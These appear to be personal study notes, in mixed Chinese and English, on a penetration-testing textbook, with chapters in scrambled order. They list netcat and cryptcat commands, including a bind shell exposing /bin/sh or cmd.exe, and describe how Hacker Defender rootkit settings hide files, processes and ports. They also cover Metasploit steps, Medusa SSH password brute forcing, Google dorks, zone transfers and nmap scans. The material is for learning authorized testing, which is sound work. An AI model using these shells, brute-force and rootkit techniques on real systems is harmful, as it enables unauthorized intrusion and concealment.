CHAPTER7 Post Exploitation and Maintaining Access with Backdoors, Rootkits, and Meterpreter 1、netcat   1、“聊天” Server: nc –l –p 1337 Client: nc 192.168.18.132 1337 建立一个TCP连接   2、传输文件 server： nc –l –p 7777 > virus.exe client： nc 172.16.45.129 7777 < virus.exe   3、获取banner信息 nc 192.168.18.132 50001 输入一些内容，查看返回信息   4、正反向shell Server： nc –l –p 12345 –e /bin/sh nc.exe –L –p 12345 c:\Windows\System32\cmd.exe Client： nc 192.168.1.1 12345 2、加密版的netcat：Cryptcat 使用-k选项修改默认密钥 Server：cryptcat –l –p 5757 Client；cryptcat 192.168.18.132 5757 3、Rootkits - Hacker Defender 配置文件： [Hidden Table]. Any files, directories, or folders listed under this heading will be hidden from the explorer and file manager used by Windows. [Hidden Processes] Each of the processes listed here will be hidden from the local user when they view currently running processes with the task manager. [Root Processes] Any programs listed here will be allowed to view and interact with programs on the system, including those listed in the [Hidden Table] and [Hidden Processes] tab. [Hidden Services] section will hide each of the listed services. Again, when interacting with the task manager, any program listed here will be concealed from the “services” list. [Hidden RegKeys] section can be used to camouflage each of these keys. You will need to make sure that you list them all in order to avoid detection. [Hidden RegValues] Entering information here will hide individual values rather than the entire key. [Startup Run] is a list of programs that will be automatically run once Hacker Defender has been started. You can use the [Free Space] section to force the computer to “add back” the amount of free space that you used. If you know of ports that you plan to open, you can list them under the [Hidden Ports] section. 4、Meterpreter 常用命令 CHAPTER 8 Wrapping Up the Penetration Test 1、Executive Summary The executive summary should be a very brief overview of your major findings. If vulnerability and exploits were discovered, the executive summary needs to focus on explaining how these findings impact the business. 2、Detailed Report This report will include a comprehensive list of your findings as well as the technical details. Always present critical findings first. The idea and use of proof-of-concept screenshots is a powerful tool and should be incorporated into the penetration testing report whenever possible. Whenever possible, when writing the penetration testing report, you need to include mitigations and suggestions for addressing the issues you discovered. 3、Raw Output [optional] 4、note： If you have agreed to deliver the document electronically, you will need to ensure that the penetration testing report is encrypted and remains confidential until it arrives in the client’s hands.

CHAPTER4 Exploitation 1、渗透神器 Metasploit 基本用法： msf> msfconsole msf> search missing_patch_number (or CVE) use exploit_name_and_path msf> show payloads msf> set payload path_to_payload msf> show optionsA msf> set option_name desired_option_input msf> exploit 一份不错的教程： Metasploit Unleashed https://www.offensive-security.com/metasploit-unleashed/ 2、在线各类服务密码破解 Medusa medusa –h 192.168.18.132 –u ownedb –P /usr/share/john/password.lst –M ssh THC Hydra https://www.thc.org/thc-hydra/

CHAPTER 2 Reconnaissance 1、什么是Reconnaissance？ 侦察（Reconnaissance）也叫做信息搜集（Information gathering），目的是搜集目标系统的详细信息。这应该是渗透测试中花费世家最长的阶段，往往却被忽略或看轻，很多失败的渗透测试都是因为前期的信息搜集不足造成的。 2、Active reconnaissance 主动侦察需要直接访问目标系统，比如对目标网站做镜像，可以使用的工具有 HTTrack、wget等。 3、Passive reconnaissance 被动侦察是通过第三方哈寻目标系统的信息，不直接与目标系统交互。 3.1、Search engine Google Hacking Googole hacking基本用法： site:dsu.edu pat engebretson allintitle:index of inurl:admin cache:syngress.com filetype:pdf site:dsu.edu filetype:pptx 更全面的Google hacking技术参考; Google Hacking for Penetration Testers Google Dorks Google Hacking Database (GHDB) other search engines: Yahoo, Bing, Ask, Dogpile Newsgroups and Bulletin Board Systems like UseNet and Google Groups Support forums, Internet Relay Chart social media like Facebook and Twitter job hunting website 3.2、E-mail Addresses 工具：The Harvester 3.3、whois whois域名 通过对域名的whois查询，可以知道域名的注册人、权威DNS服务器等信息。 命令行工具：whois target_domain 在线查询网站：http://www.whois.net whois ip 通过对IP的whois查询，可以知道该IP所在的IP块、IP拥有者等信息。工具同上。 3.4、网站综合信息查询 Netcraft 3.5、IP与域名之间的转换 host target_hostname host IP_address 3.6、DNS信息 nslookup nslookup \> server 8.8.8.8 \> set type=any \> baidu.com dig dig @target_ip dig @192.168.1.23example.com –t AXFR fierce ./fierce.pl –dns trustedsec.com 3.7、E-mail Servers Send an e-mail to the organization with an empty .bat file or a nonmalicious .exe file like calc.exe Analysis the header and body of the rejected message 3.8、Metadata MetaGooFil ./metagoofil.py -d syngress.com –t pdf,doc,xls,pptx –n 20 -o files –f results.html 3.9、综合信息搜集工具 ThreatAgent FOCA SearchDiggity Maltego Robtex CHAPTER 3 Scanning 1、Pings and Ping Sweeps ping ping target_ip fping fping –a –g 172.16.45.1 172.16.45.254>hosts.txt 2、Port&Service Scanning nmap nmap –sT -p- -Pn 192.168.18.132 nmap –sT -p- -Pn 192.168.18.1-254 nmap –sS -p- -Pn 192.168.18.132 nmap –sU 192.168.18.132 nmap –sUV 172.16.45.135 nmap –sX -p- -Pn 192.168.18.132 nmap –sN -p- -Pn 192.168.18.132 nmap --script banner 192.168.18.132 nmap --script vuln 192.168.18.132 3、Vulnerability Scanning Nessus https://www.tenable.com/downloads/nessus 4、 其他扫描工具 OpenVAS NeXpose Metasploit Core Impact Canvas

CHAPTER 1 What is Penetration Testing? 1、什么是渗透测试？ Penetration testing can be defined as a legal and authorized attempt to locate and successfully exploit computer systems for the purpose of making those systems more secure. 渗透测试是通过攻击和入侵系统，发现系统存在的安全问题，帮助用户解决这些问题，从而提高系统的安全性。这是一种合法的、具有授权的网络攻击行为。 2、渗透测试的技术、方法和工具与现实中攻击者所使用的是相同的。 The general idea is to find security issues by using the same tools and techniques as an attacker. 3、与渗透测试相同的概 Pen testing PT Hacking Ethical hacking White hat hacking Offensive security Red teaming 4、白帽子与黑帽子的区别？ At its core, these differences can be boiled down to three key points: authorization, motivation, and intent. 5、白盒测试与黑盒测试 White box penetration testing, also known as “overt” testing, is very thorough and comprehensive. 白盒测试，用户提供目标系统的详细信息，比如网络拓补结构、服务器配置、应用系统源代码等，渗透人员根据这些信息寻找系统安全问题。 Black box penetration testing, also known as “covert” testing, employs a significantly different strategy. 黑盒测试，渗透人员对目标系统几乎一无所知，可能只知道目标的企业名称或者一个域名，剩下的信息需要渗透人员自己去搜集。这种测试更像是现实中的网络攻击和入侵行为。 6、 渗透测试的流程 已经有很多成熟的渗透测试方法论，不过都大同小异。这本书将其简化为四个步骤，如下： 这几个步骤并不是依次线性地做完即可，而应该是随着测试的进行与深入，循环进行的，如下：